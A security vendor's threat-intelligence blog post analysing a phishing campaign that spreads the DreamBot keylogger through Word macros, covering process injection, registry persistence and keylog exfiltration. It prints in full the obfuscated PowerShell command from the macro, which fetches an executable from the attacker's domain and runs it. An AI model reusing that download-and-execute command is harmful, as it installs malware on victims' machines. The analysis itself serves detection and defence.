DreamBot Campaign Dreams Big

May 31, 2018 | Luis Mendieta


Beginning late April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif. The downloaded DreamBot payload turned out to be a stealthy keylogger, contrary to previously observed behavior from this malware family. The campaign, which lasted several weeks, continually rotated its distribution architecture by using a variety of domains and IPs. At the time of this writing the campaign is still active.

Distribution Analysis

Anomali Labs was able to track this campaign by analyzing and observing the document lure and payload syntax. For the purpose of this report, the EWS_Inquiry.doc dropper (MD5 b20263ba3773b91bdd947af429e289af) was analyzed. The document lure is a mock Office365 message enticing the user to “Enable Editing”, then “Enable Content” to view the document.

Figure 1 Malicious Document Lure

Malicious macros are a popular choice for attackers because they are relatively easy to create and require limited user interaction. The EWS_Inquiry.doc contains multiple heavily obfuscated macros with random names. Upon execution, the macro uses PowerShell to initiate an HTTP GET request to http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn.

powershell " ('V'+'SDns'+'adasd ='+' &(8n'+'7'+'n8n7'+'+8n7e'+'8n'+'7+8n'+'7w-o'+'bje'+'c8n7+8n7t8n7'+') ra'+'nd'+'om;VSDYYU '+'='+' .(8n7ne'+'8n7+8n'+'7w8n7+8n7-ob'+'ject8n7) Syste'+'m.N'+'et.W'+'eb'+'Clie'+'nt;'+'VSD'+'NS'+'B'+' '+'='+' '+'VSDns'+'a'+'dasd.'+'next(1'+'0000'+', 2821'+'33);VS'+'D'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'+' (8n7.ex'+'8n'+'7+8n7e8n7);f'+'or'+'ea'+'c'+'h'+'(V'+'SD'+'asf'+'c '+'in VS'+'DAD'+'CX){'+'tr'+'y{VSD'+'YYU.xPr'+'D'+'oKcVW'+'nl'+'KcVOa'+'dF'+'IKcVl'+'exPr(V'+'S'+'D'+'asfc.xPrToStrK'+'cViKc'+'VNg'+'xPr(), VS'+'DS'+'DC'+')'+';&(8n'+'7Invo8n7+8n7k8'+'n7+8n7'+'e-Item8n7'+')'+'(VS'+'D'+'SDC'+');'+'b'+'r'+'eak;}c'+'a'+'tc'+'h{}'+'}').RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`').RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39).RePlacE('wZU','\').RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34).RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$') |& ((vARiaBLe '*mdr*').NAmE[3,11,2]-JoIN'')

Figure 2 PowerShell Command to Download Payload

The resulting payload is downloaded to C:\Users\Public\{number}.exe and executed.

Technical Analysis

Host Indicators

The DreamBot implant we observed has close similarities to the variants reported by Proofpoint analysts (See Footnote 1). Perhaps the most interesting characteristic of this variant is its flow of execution. First, the PowerShell script executes the downloaded payload, which spawns a child process. Next, the child process executes the legitimate Windows utility “control.exe”. The implant payload injects code into “control.exe” process space, and then creates a series of registry keys that are consistent with DreamBot. Figure 3 below show the created keys:

Figure 3 Registry keys created by Control.exe

The registry keys seen in Figure 3 are located at the following paths:

HKCU\SOFTWARE\AppDataLow\Software\Microsoft\{Random id number}

During the next step of the execution chain, control.exe injects code into the explorer.exe process space. When the injected code starts running on Explorer.exe, in installs a persistence mechanism in the HKCU\...\CurrentVersion\run registry key. See registry key path below:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adprfest  = [path of payload]

The memory space of the explorer.exe process contained the presence of several domains related to the compromise. We also observed full URLs used for C2 communications, as can be seen in the figure below:

Figure 4 Explorer.exe memory strings

Network Communications

This variant of DreamBot communicates over HTTPS. Anomali Labs intercepted the SSL traffic to uncover the transmitted data. Analysis of the HTTPS request revealed the transfer of small Windows .cab files with the following naming convention: [A-Z0-9]{4}.bin. Figure 5 below shows the decrypted HTTPS request:

Figure 5 Decrypted HTTPS request

We analyzed the exfiltrated .cab files and discovered they were actually keylog files. Figure 5 below demonstrates the content of one of these files:

Figure 6 Keylog Data


Anomali Labs’ research of this DreamBot campaign identified significant developments in recent DreamBot deployment.

  • The usage of process injection twice is unique and serves to complicate analysis because identifying the breakpoint in the newly injected processes outside of the current debugger is difficult and requires monitoring Windows API calls outside of standard process debugging.
  • The use of DreamBot as a keylogger differs from DreamBot’s previous usage as a banking trojan. This could indicate attackers are broadening the scope of targeting for this campaign beyond banking credentials.

Anomali Labs will continue to track this campaign and provide our clients with updated IOCs and reporting.

Indicators of Compromise

DreamBot Delivery


DreamBot Command and Control

1. https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

Luis Mendieta
About the Author

Luis Mendieta

Luis Mendieta is a senior security researcher who enjoys poking inside malware and building automated systems to process threat data. He has 5 years in the security industry, focusing on intelligence and research. Currently at Anomali, Luis researches the latest malware families and builds tools that allows for faster analysis and processing. Previously, he has worked as a senior threat analyst at Verizon supporting cyber security incident response engagements with cyber intelligence capabilities. prior Verizon he worked at Terremak as SOC analyst 2 then moved up the ranks to become investigations analyst. Luis enjoys playing scenario paintball, running and outdoors.

Get the latest threat intelligence news in your email.